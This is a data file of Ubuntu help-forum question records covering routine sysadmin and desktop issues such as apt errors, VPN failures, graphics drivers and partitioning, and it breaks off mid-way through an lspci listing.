344548	receive email on ubuntu server and filter data from it	could someone give me a simple answer ? i have an ubuntu vserver with an url like vserver.servers.com and a domain named like domain.com what i would like to be able to is , to receive emails that are send to username @ domain.com these emails should be saved in a mysql database . ( only the body of the emails ) it wont be an email service or so , all i need to do is receive emails that are send to my domain . its assumed that all emails have important data , that i will need to filter with php or node.js so i dont need to be able to send emails . i kind of could find out that i might need postfix , is that right ? please just tell me what the things are that i need ? so far i only could find answers with full emailing server tutorials which are n't really helpful=/ please answer and do n't just dislike , i need this information.. thank you !
344550	where to send feature request ?	my problem is that resizing windows is a pain . ( related question : one pixel 'grab ' area when resizing windows , but resizing at the edges is still too clumsy , i do know about the drag-to-edge-resizing but that is not appropriate for all scenarios ) i used to set up tiling window managers or do other tweaking , but that is a lot of grief ( takes time ; not everything will work appropritely , e.g . indicators ; you never know what will break with an upgrade ; non-official ; etc . ) instead i would like to make a simple request of making the area at which to click for resizing to be much-much-bigger . my suggestion is that since there are no button on the right side of the window-header , it could be much larger there . for example a sqaure with side-length equal to that of the thickness of the window-header . where can i post this rewust so it has the most potential of being realized ?
344553	window creation error when running `` second life ''	i am using ubuntu 12.4 , ubuntu 2d program . i use the 2d setup because the regular ubuntu is n't allowing me to see anything for some reason . anyway , i play a game called second life after i 've downloaded their required viewer i get a small box screen that says window creation error why ? number 2 : i can not get the update packages from the archives manager states that `` jaunty backport '' is missing or not found . why ?
344556	can not change synaptic trackpad clickpad areas in synclient/xinput	i have run into trouble trying to configure the clickpad areas of the cypress trackpad in the dell xps 13 . by default , if i press the left button , i get a left click , if i press the right button , i get a right click . i would like to change these areas ( perhaps disable the right button and/or add a middle button ) . setting in synclient the rightbuttonarealeft/etc . does not seem to produce a change in the area that registers a right button click . similarly , setting it in 50-synaptics.conf or setting it in xinput '' synaptic soft button areas '' does not seem to produce a change . would it be possible that changing these options does n't do anything because the cypress driver does not support these changes ? see https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/978807/comments/108 i am running a fresh install of ubuntu 13.04 ( also tried on xubuntu 13.04 ) . kernel 3.8.0-19 ( everything else works , including backlight and wifi ) . my understanding is that i do n't need to add the sputnik ppa because everything has been pushed into 13.04 ... i confirm that synclient and xinput are accepting other options , e.g . touchpadoff , tapbutton , clickfinger . setting clickpad to 0 does not turn the clickpad left/right button functionality off , too ! still , i can left and right button click in the same trackpad areas . perhaps this is relevant : i have noticed is that xinput test seems to show x , y coordinates that correspond not to the position of a touch but to the position of the mouse cursor on the screen ( left upper corner being 0,0 and bottom right corner being 1600,900 ) . but synclient -m 1 ( needs shmconfig enabled , set in 50-synaptics.conf ) produces coordinates that correspond to the touch position ( bottom right corner being 1100,620 ) . this seems odd because the default rightbuttonarealeft in synclient ( equivalently , the first value of synaptics soft button areas in xinput ) is set to 800 ( exactly half of 1600 , the x coordinate shown by xinput when the cursor is at the right edge of the screen ) . shouldn't this be half of the right edge touch position , 550 ? similarly with the y coordinate . any insight would be much appreciated .
344557	where can i put a user-defined terminal function ?	i am planning to create a function that would simplify things for me . the function would be something like function lazymode ( ) { echo `` hello world ! `` ; } so that when i use the command lazymode in the terminal , it will output the `` hello world ! '' what file should i put the user-defined function ?
344568	ca n't use sudo but only su	as root , i created a new user and added to sudo group with adduser myuser sudo but when i try to sudo something i got the sorry , try again . error . the curious thing is that i can use su without any problem . ( i 'm on a vps with a fresh install of ubuntu server 12.04 )
344572	emptying the contents of a text file	i have a text file in my home directory which receives data regularly through a cron job . because the cron job provides dynamic data , i would also want to set a cron job to empty the file contents ( the file must still exist ) . i do n't need help with cron , just the command which can help with emptying the file .
344573	pptp vpn connection failed	i 'm trying to set up a vpn connection and it gives me the message `` the vpn connection 'vpn ' failed '' i set up the connection following the guidelines here : https : //www.goldenfrog.com/support/vyprvpn/vpn-setup/linux/pptp my /var/log/syslog says this : sep 12 16:38:52 abby networkmanager [ 904 ] : < info > starting vpn service 'pptp ' ... sep 12 16:38:52 abby networkmanager [ 904 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 7374 sep 12 16:38:52 abby networkmanager [ 904 ] : < info > vpn service 'pptp ' appeared ; activating connections sep 12 16:38:52 abby networkmanager [ 904 ] : < info > vpn plugin state changed : starting ( 3 ) sep 12 16:38:52 abby networkmanager [ 904 ] : < info > vpn connection 'la ' ( connect ) reply received . sep 12 16:38:52 abby pppd [ 7378 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . sep 12 16:38:52 abby pppd [ 7378 ] : pppd 2.4.5 started by root , uid 0 sep 12 16:38:52 abby pppd [ 7378 ] : using interface ppp0 sep 12 16:38:52 abby pppd [ 7378 ] : connect : ppp0 < -- > /dev/pts/1 sep 12 16:38:52 abby networkmanager [ 904 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 12 16:38:52 abby networkmanager [ 904 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . sep 12 16:38:52 abby networkmanager [ 904 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... sep 12 16:38:52 abby pptp [ 7381 ] : nm-pptp-service-7374 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated sep 12 16:38:52 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' sep 12 16:38:52 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply sep 12 16:38:52 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . sep 12 16:38:53 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' sep 12 16:38:53 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . sep 12 16:38:53 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 7664 ) . sep 12 16:38:56 abby pppd [ 7378 ] : ms-chap authentication failed : no matching user matching 'xxxxxx ' found in the database.^j sep 12 16:38:56 abby pppd [ 7378 ] : chap authentication failed sep 12 16:38:56 abby pppd [ 7378 ] : connection terminated . sep 12 16:38:56 abby avahi-daemon [ 952 ] : withdrawing workstation service for ppp0 . sep 12 16:38:56 abby networkmanager [ 904 ] : < warn > vpn plugin failed : 1 sep 12 16:38:56 abby networkmanager [ 904 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 12 16:38:56 abby pptp [ 7381 ] : nm-pptp-service-7374 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error sep 12 16:38:56 abby pptp [ 7381 ] : nm-pptp-service-7374 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log sep 12 16:38:56 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) sep 12 16:38:56 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' sep 12 16:38:56 abby pptp [ 7390 ] : nm-pptp-service-7374 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) sep 12 16:38:56 abby pppd [ 7378 ] : exit . sep 12 16:38:56 abby networkmanager [ 904 ] : < warn > vpn plugin failed : 1 sep 12 16:38:56 abby networkmanager [ 904 ] : < info > vpn plugin state changed : stopped ( 6 ) sep 12 16:38:56 abby networkmanager [ 904 ] : < info > vpn plugin state change reason : 0 sep 12 16:38:56 abby networkmanager [ 904 ] : < info > policy set '213 mp2 ' ( wlan0 ) as default for ipv4 routing and dns . sep 12 16:38:56 abby networkmanager [ 904 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . sep 12 16:39:02 abby networkmanager [ 904 ] : < info > vpn service 'pptp ' disappeared i notice the line saying `` no matching user matching 'xxxxxx ' found in the database.^j '' however i know the credentials are correct as i am using them on my windows set up with no problems . i am a novice here and not sure what to try in order to resolve this . thanks
344576	run command if window is fullscreen ?	is there any way to run a pre-set command everytime any window goes fullscreen ? i want to run unclutter whenever an application goes fullscreen and close it when the app leaves fullscreen . i tried devilspie , but it ca n't match properties like size . edit : or , is there any other way to auto-hide the cursor for every fullscreen window , regardless of the application ?
344583	i wont to diable windows 8 option in booting and directly start with ubuntu 12.04	first i have windows 8 and i was installed ubuntu 12.04 from windows 8. now when i start the system it shows screen with 2 os names for booting selection . but i wont to directly boot the ubuntu 12.04 withou showing select screen at the time of system startup because my friends alwways pefer to windows 8 selction in booting time . thats way i wont to hide the windows 8 selection when i start the system plzzzz ... help me
344588	sudo apt-get error !	update : i ca n't run sudo rm /var/lib/apt/lists/* -vf as suggested on this site elsewhere as i get this message : rm : can not remove â/var/lib/apt/lists/partialâ : is a directory when i issue the command sudo apt-get update , i get this error message : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-updates_multiverse_i18n_translation-en % 5fgb e : the package lists or status file could not be parsed or opened . i have tried to open my package manager , synaptic , but it gives me this error : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-updates_multiverse_i18n_translation-en % 5fgb e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . running 'apt-get ' as suggested in the first error message just gives general commands and info . i have also tried changing the mirror servers but it does n't help . on the drop down menu on the task bar where the stop sign is , i have clicked the show updates , install all updates , check for updates and start package manager ; all of which give me the second error message . i 'm running 13.04 how do i go about fixing this ?
344589	where is everything saved when i `` try ubuntu without installing ? ''	the reason i ask is because i ran out of space each time steam tried to unpack , and none of my drives or devices are full .
344593	how to delete selected results from bash history ?	history command shows all the results but we can filter to get particular command using history | grep searchingcommand . it is really helpful . but the problem is it shows those commands also which was entered with typo error or which was unsuccessful . then identifying the correct one is really a pain . i checked this link : selective command-history in the terminal ? but that was not my solution . so is there a way to delete those commands from the history which was incorrect at the time entered or later ?
344596	ubuntu 13.04 intel graphics on intel desktop board dh87rl	my new desktop pc has , intel desktop board dh87rl and hpw1707 lcd screen that can support apprx . 1440x900 resolution . but i only get 1024x768 and 800x600 . i tried intel linux graphic installer but still no luck with a higher resolutions . can someone please help me , what i can do get this issue fixed . many thanks .
344598	update israel time zone	when checking the date on my ubuntu i get this result : > > date thu sep 12 11:42:27 ist 2013 but the ist time is actually 12:42:27 there was an issue this year with the winter clock change , but i wonder if it 's not updated in some global time zone db ? i know i can change it manually , but i would like to keep it automatic and just update against some remote db ? ( i think it works that way ) when asking google for israeli time , they seem to display it correctly . thanks
344599	after failed partition resize , ubuntu wo n't boot . it just keeps rebooting again and again	so , here 's the thing . i was moving a partition with gparted and i stupidly clicked something that crashed the program . now when i turn on my computer and select ubuntu 12.04 recovery ( with linux 3.2.0-41-generic ) it fills the screen with text then reboots . i tried with my old linux ( 3.0.0-12-generic ) recovery mode and it filled the screen with text and stopped and did nothing ( see screenshot ) . when i tried windows xp ( i have windows xp dual boot ) , it just brings up a blank screen with a flashing line . i do n't know what to do , i can do a full re-install if i need to but would n't prefer to . ( sorry about how blurry the screenshot is ) thanks , a newbie in need of assistance ! !
344600	lighttpd starts but does n't work . lighttpd.pid permission denied	system : ubuntu 12.04 server restarting lighttpd show status as [ ok ] but on performing netstat -ntulp i do n't find the lighttpd server to be running . here is a screenshot showing the results . as you can see checking the syntax of server config reveals that there is a permission error on /var/run/lighttpd.pid . a quick ls -l reveals that it is owned by root user . so i quickly changed ownership of lighttpd.pid to the server.username/server.group = www-data , and reloaded lighttpd along with a check through netstat . my efforts have failed . the pid keeps changing back to root ownership . here is my lighttpd.conf . any help on this would be appreciated . thankyou .
344604	prevent packages from being removed after doing `dpkg -- set-selections`	im trying to install all the packages installed on the other host . from host = ubuntu 12.04 lts to host = ubuntu 12.04 lts i 've ran dpkg -- get-selections > packages.txt on the 'old'-system . to import them to the newer system i 've ran : dpkg -- set-selections < packages.txt . this seems to be working fine . but when i try to install them ; apt-get tells me it wants to remove the following packages : e2fsprogs libblkid1 ( due to e2fsprogs ) libuuid1 ( due to e2fsprogs ) util-linux ( due to e2fsprogs ) hostname mount libmount1 ( due to mount ) acpid adduser aptitude console-setup cron dmsetup dselect e2fsprogs eject grub-common grub-gfxpayload-lists grub-pc grub-pc-bin grub2-common hostname ifupdown initramfs-tools initscripts kbd keyboard-configuration libblkid1 libdevmapper1.02.1 libmount1 libuuid1 libxapian22 linux-image-3.2.0-49-virtual linux-image-virtual linux-virtual module-init-tools mount mountall netbase ntpdate openssh-client openssh-server passwd plymouth procps resolvconf rsync rsyslog tasksel tasksel-data ubuntu-minimal udev upstart ureadahead util-linux the problem is ; i see a couple of 'required ' packages that i do n't want to deinstall/remove . is there a command like apt-get upgrade -- only-install ? or is there a work-around to only install the packages ?
344608	google maps hang my ubuntu	system hang after sometimes scrolling the map and zoom in-out . i tried different browser , chrome and firefox and the result was the same . i need to hardly shutdown my system and restart ubuntu to fix it .
344610	trouble installing specific .tar.bz2	i 've used ubuntu for over a year now and i have never gotten the hang of tarballs . i have a .tar.bz2 , i 've extracted it but i ca n't figure out where to go from here . i tried running ./configure but i got no such file or directory . there 's a folder called config ; i 'm not sure of the significance of that , though , or what i should do with it . there 's no readme or anything like that . any ideas ? edit here 's the directory hierarchy : config wl.mk wlconfig_lx_shared wlconfig_nomimo wl_default wl_hnd linux wl_ap.o wl_apsta.o wl_sta.o
344614	about installation	i am a new user to ubuntu , presently using ubuntu 13.04 32-bit . i ca n't install any software from the ubuntu software center . it says `` available from universe source '' and there is button for `` use this source '' not for install
344616	how to install teamspeak 3 client on ubuntu 12.04 lts 32 bit ?	i have been trying to install teamspeak using the following file but have been unable to do so . i use ubuntu 12.04 lts 32-bit . http : //files.teamspeak-services.com/releases/3.0.12/teamspeak3-client-linux_x86-3.0.12.run kindly help with detailed steps since i have started using ubuntu only yesterday .
344621	unity fail after attempted nvidia install and removal	i have had a running 13.04 system for quite some time now . however , i had n't tried to install the nvidia drivers on it . i also had a similar problem on a 12.10 system . in the past i resolved this problem by re-installing the whole system . i attempted to install nvidia-current from the repository , and for the most part it looked like it was successful , except that after reboot unity was mostly borked . i could see the wallpaper and my wine application icons on the desktop . no side-bar menu and no top panel and no response to the super-key . i could still do ctl-alt-t to get a terminal . i removed/purged nvidia* thinking that would solve the problem . it did not . i thought i might just install another copy on a different partition , using the same home partition , then compare what might be different . that showed the same behavior ! ! so i created another account and when i logged into that voila , unity is back to its original ugly ( out of the box ) self , in that account only . so this suggests that rather than something buried deep in /etc it is something in my /home/ < user > . i doubt anyone can simply diagnose what is going on for me specifically , but can someone teach me to fish ? tell me what to look for to help diagnose what is happening . i have lots of stuff hidden and otherwise in my home directory , and there are all sorts of files in /var/log . but which ones , and what to look for is more of what i need . on the other hand , if someone knows how to fix this specific problem , i can take the next one as a learning experience instead . -- b
344624	mysql processes with high cpu usage	mysql server is consuming very high values ( 80-120 % ) every few seconds ( once every 5-10 sec ) , is that usual ? mysql processlist is not big at all , i do n't use to see more than 3 queries simultaneously . i 'm having problems with this server because mysql is getting stacked every 5-10 days , and i 'm investigating possible solutions . thanks .
344629	how do i install the latest development libraries of ffmpeg in my ubuntu ?	i am about to install ffmpeg 2.0.1 ( the latest version ) in my ubuntu . i already have the older dev libraries installed in my system . in the previous installation , i did n't build them from source . i used `` synaptic package manager '' . can anyone help me with the following problems : why does the synaptic package manager not show the latest versions , so that i can easily update to them ? can i do something to fix it ? how can i find the version of the libraries that are already installed on my system ? ( i know for sure that it is an older version , but i want to know the version number ) . i am trying to delete the older version entirely and again install the new libraries from source . can anyone help me with this ?
344630	can not remove sublime text 2 because of installing package control	after setting up sublime text 2 , i tried to install package control but i faced an error . then every time i open sublime text 2 , there was an error : unable to run package setup : traceback ( most recent call last ) : file `` ./packagesetup.py '' , line 165 , in upgrade upgradepackage ( pkg , pristinedir , datadir , backupdir ) file `` ./packagesetup.py '' , line 158 , in upgradepackage os.path.join ( backupdir , base ) , inhibitoverwrite ) file `` ./packagesetup.py '' , line 90 , in upgradearchive writefile ( fname , newar.read ( f ) ) file `` ./packagesetup.py '' , line 18 , in writefile with open ( fname , 'wb ' ) as fo : ioerror : [ errno 2 ] no such file or directory : u'/home/halink/.config/sublime-text-2/packages/package control/package_control/preferences_filename.py' can anybody tell me how to fix it or how to remove sublime text and i can re-install it ?
344631	wubi overwrites my ubuntu username to administrator and ignores my password	i know there are ways to get your root access back and change your password , but every time i try a new flavor of ubuntu ( installing using wubi ) my username/password is ignored . after installing and rebooting , my ubuntu login screen shows the username `` administrator '' ( my windows account name ) and no password ever works . when i try to use recovery mode to change the password , the keyboard input appears to be blank . this does n't happen when running ubuntu directly from a partition of its own . currently running wubi from a win7 sp1 amd 4400+ machine .
344632	ubuntu 13.04 and reliance netconnect usb modem	i have recently procured a reliance netconnect+ usb connection for accessing internet . i have the following observations : netconnect+ modem is detected by microsoft windows but is not detected `` visually '' by ubuntu 13.04 in fact , when i tried using lsusb and dmesg , i can actually `` see '' that the modem ( which is said to act both as cd and usb ) , is detected . i have tried using gnome-ppp and wvdial and both `` fail '' to detect the modem interface wise . however , the vendor , in this case reliance , assures that the modem works in ubuntu .
344635	are manually mounted disks automatically properly unmounted on reboot/shutdown ?	i am facing unsolved behaviour of automounting using fstab as described in disk mounted shows wrong size in df , and appears empty so i used the workaround to have a fstab entry : uuid=77f20268-9df4-43bb-89bb-54648c921f4f /mnt/disk1 ext4 rw , suid , dev , exec , noauto , users , async 0 0 basically noauto is the crucial thing here . then i am mounting the disk using mount -u 77f20268-9df4-43bb-89bb-54648c921f4f /mnt/disk1/ in /etc/rc.local . it is working fine now , disk is mounted automatically on reboot . but i wonder if the disk is also properly umounted on reboot/shutdown . can anybody confirm this for ubuntu server 12.04 lts ?
344636	how can i extract images from a raw email ?	rather an odd problem that i 'm sure has a multitude of answers . somebody sent me an email with a ton of images embedded into the email body . here 's how the end of the raw message starts ( it goes on for over a hundred different files ) : ... < /body > < /html > = -- apple-mail=_aaaa58dc-2c74-402a-b582-aaaaaa4e33aa content-transfer-encoding : base64 content-disposition : inline ; filename=cat.jpeg content-type : image/jpg ; name= '' cat.jpeg '' /9j/4aaqskzjrgabaqaaaqabaad/4gxysundx1bst0zjteuaaqeaaaxitglubwiqaabtbnryukdc ifhzwiahzgacaakabgaxaabhy3nwtvngvaaaaabjrumgc1jhqgaaaaaaaaaaaaaaaaaa9tyaaqaa aadtluhqicaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabfj ... is there anything out there that can parse this raw email and turn it into a pile of pictures ?
344638	how to reinstall 12.04 with no cd	i am trying to run the ubuntu installer in order to do a 12.04 to 12.04 upgrade effectively reinstalling ubuntu without losing personal files . please could someone point me in the right direction regards stewart
344639	portable installation on ext2 flash drive wo n't boot	i 've been running ubuntu from my flash drive for a while now , but due to the frequent read/write feature of the journaling system , it was excessively slow . i read about how it might be this slow running ubuntu on my ext3/ext4 file system on my flash drive , i decided to reinstall the whole thing with ext2 instead , and trouble ensued . it was very perculiar that it does n't seem to have any problem running the newly installed system the first time after installation following the restart option the installer offers , but it will never successfully boot ever again . here 's what i run into instead of my ununtu system : ata_id [ 259 ] : hdid_get_identity failed for '/dev/sdb ' : invalid argument gave up waiting for root device . common problems : - boot rags ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/sdc1 does not exist . dropping to a shell ! busybox v1.19.3 ( ubuntu 1:1.19.3-7ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) cat /proc/cmdline boot_image=/boot/vmlinuz-3.5.0-17-generic root=/dev/sdc1 ro quite splash i suspect the problem is grub points at /dev/sdc1 , which is my flash drive for boot sequence , but somehow my computer failed to find it . can anyone help me with this ?
344640	can a weak ubuntu user password be a risk for online security ?	can anyone gain an unauthorized remote access to my ubuntu machine ? does having a strong user password really helps prevent this ? or firewall just does n't let anyone in by default , regardless of the password ?
344642	please recommend a hex editor for shell	can you recommend a hex editor that can be run from shell ? i need to be able to edit not only view the content .
344648	how do i install ubuntu server 12.04 without losing my windows 7 files ?	i have 3 partitions on my compaq presario cq 57 in which : partition 1 has 55 gb ( it has windows 7 ) . partition 2 has 225 gb with no data stored partition 3 has 18gb free . so , i want to install ubuntu server 12.04 in partition of # 3 but i do n't know how to make it and i do n't want to lose my windows 7 files . please help me .
344655	how can i partition my ubuntu hard drive	how can i partition my ubuntu hard drive.im us覺ng linux ubuntu server and 覺m trying to partion into two .can you help me how to do this.still new to ubuntu
344657	how can i detect unknown/unapproved devices with udev ?	i 'm designing a security sensitive setup for a client . the situation is as follows : sensitive information has to be stored on a server that might be accessed by unauthorized personnel . there is no way to secure the hardware in a way that it is 100 % secure . here my approach : i 'm encrypting the root machine with cryptsetup/luks , then i 'm encrypting an image with cryptsetup/luks and mounting it to be a virtual machine 's harddrive . the virtual machine has again an encrypted root fs . now i want to prevent anyone from accessing the machine 's hardware while it is running . i want to detect unknown devices that are plugged into it , like a usb-thumbdrive or a firewire device , etc . is there a way to detect unknown devices elegantly in udev ? so far i 've only found ways to define actions for devices i know . but i want to define an action for when an unknown device connects . thanks for your input .
344663	canyon printer drivers problem	i wan na give a question when i try install canyon drivers i getting this popup sorry , installation of this driver failed please have a look at the log file for details : ~/var/log/jockey.log thanks .
344664	how can i crash my mbr on ubuntu server	how can i crash my mbr on ubuntu server.i am trying to crash my bacula system and when i was going through some documents i saw that i can do this by crashing the master boot record.anybody to help
344665	good media catalogue for ubuntu	i have a lot of audio cds , dvds , data cds/ dvds containing audio/ video media like mp3 files or mp4 files , etc . could you please recommend some software that will index this media and let me search the database ? so , i can tell dvd1 contains this movie and data dvd4 contains this mp4 file , etc . i am running ubuntu 13.04 , more specifically , gnome 3.6
344668	ubuntu 12.04 lts problems with thinkpad t530 nvidia graphics card - discrete graphics will not boot	i have been running ubuntu 12.04lts for about 4 months and i have been running dual monitor via the thinkpad lcd screen and a vga connection to my main monitor , however ideally i would like to run dual digital dvi out ( using a docking station ) . the nvidia graphics card / discrete graphics mode will not allow ubuntu to boot . i have tried every method of updating nvidia drivers , and this has not helped solve my issue . my process : reboot - open bios - enter lenovo display options , change graphics mode to discrete graphics from integrated graphics ( ignoring nvidia optimus ) - exit and save ( reboots ) - system hangs loading ubuntu . i get a black screen with the blinking underscore , system does not respond to any interaction . i am forced to hard shutdown my machine , only way to get ubuntu to run again is to switch back to integrated graphics mode . help ?
344671	13.04 always prompts for network password on startup	this is a recent issue . whenever i start up my laptop , it will attempt to automatically connect to my school network ( wpa2-enterprise ) as it should . however , it prompts me for the password on the login screen every time ( unless i log in before it is able to attempt the connection ) . i have checked/tried the following /etc/networkmanager/system-connections has root read-write permissions . 'all users may connect to this network ' is checked in the network 's settings by default , and i have unchecked , saved , and rechecked just to make sure . the ( correct ) password is indeed saved in the network settings i 've noted that there is no problem attempting to manually/automatically connect when i have already logged in . i even logged in and back out and then switched the wireless on and off , and it did n't have an issue connecting again . any advice ? edit ; i previously thought this was a general issue with all networks , however i believe it only occurs when connecting to my school 's wpa2-enterprise network , not my wep personal router .
344676	webcam is not supported in ubuntu	i am using ubuntu on my vaio cr vgn-cr35g/r . i am unable to use my webcam by the button on my laptop . i have installed cheese webcam utility but that also does not recognise my webcam . what to do ?
344678	udev held back by apt-get while using ondrej systemd ppa	for probably about a month now , udev has been held back by apt-get when running apt-get updgrade . the following packages have unmet dependencies : udev : depends : sysv-rc ( > = 2.88dsf-24 ) but 2.88dsf-13.10ubuntu11.1 is to be installed or file-rc ( > = 0.8.16 ) but it is not installable e : unable to correct problems , you have held broken packages . i thought it might go away eventually as packages were updated , but as i said , it 's been about a month now . i 'm wondering if someone might have some insight on why i ca n't update this package ( i tried googling , but my google-fu on this problem is a little weak ) . i 'm running ubuntu 12.04 , and this is on a server-type machine ( no gui ) . i have the following ppa 's on my system : ~nijel/phpmyadmin ~ondrej/apache2 ~ondrej/debhelper ~ondrej/mysql ~ondrej/php5 ~ondrej/systemd ~svn/ppa ~rwky/redis and also the postgres apt repository . i looked through them all , and did n't see any of the packages above being provided by these ppa 's , but i thought i would mention it .
344682	ralink rt3290 wireless card not working & graphics card is not working ?	i have the following configuration . my wifi is not working properly its not showing any range ... some times it connects some times it is disconnecting . i tried to install the ralink rt3290 driver for linux as mentioned in how do i get a ralink rt3290 wireless card working ? but when i run make and make install i am getting error 2 also i have problem with graphics card , i think it is not installed properly . the system becomes too hot ; my laptop is hp pavilion g6 tx2230 ; battery is emptied in 30 minutes . here is my configuration . kindly provide me a step by step instruction to make it ok . thanks in advance.. lspci -v 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) subsystem : hewlett-packard company device 183e flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=06 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : a2000000-a2ffffff prefetchable memory behind bridge : 0000000080000000-000000008fffffff capabilities : < access denied > kernel driver in use : pcieport 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 183e flags : bus master , fast devsel , latency 0 , irq 45 memory at a3000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at 90000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : hewlett-packard company device 183e flags : bus master , medium devsel , latency 0 , irq 41 memory at a3600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) subsystem : hewlett-packard company device 183e flags : bus master , fast devsel , latency 0 , irq 47 memory at a3614000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 183e flags : bus master , medium devsel , latency 0 , irq 16 memory at a3619000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : hewlett-packard company device 183e flags : bus master , fast devsel , latency 0 , irq 48 memory at a3610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=0 memory behind bridge : a3500000-a35fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=08 , subordinate=08 , sec-latency=0 i/o behind bridge : 00003000-00003fff prefetchable memory behind bridge : 00000000a3400000-00000000a34fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=09 , subordinate=0e , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : a1000000-a1ffffff prefetchable memory behind bridge : 00000000a0000000-00000000a0ffffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 183e flags : bus master , medium devsel , latency 0 , irq 20 memory at a3618000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) subsystem : hewlett-packard company device 183e flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : hewlett-packard company device 183e flags : bus master , 66mhz , medium devsel , latency 0 , irq 42 i/o ports at 5088 [ size=8 ] i/o ports at 5094 [ size=4 ] i/o ports at 5080 [ size=8 ] i/o ports at 5090 [ size=4 ] i/o ports at 5060 [ size=32 ] memory at a3617000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) subsystem : hewlett-packard company device 183e flags : medium devsel , irq 10 memory at a3615000 ( 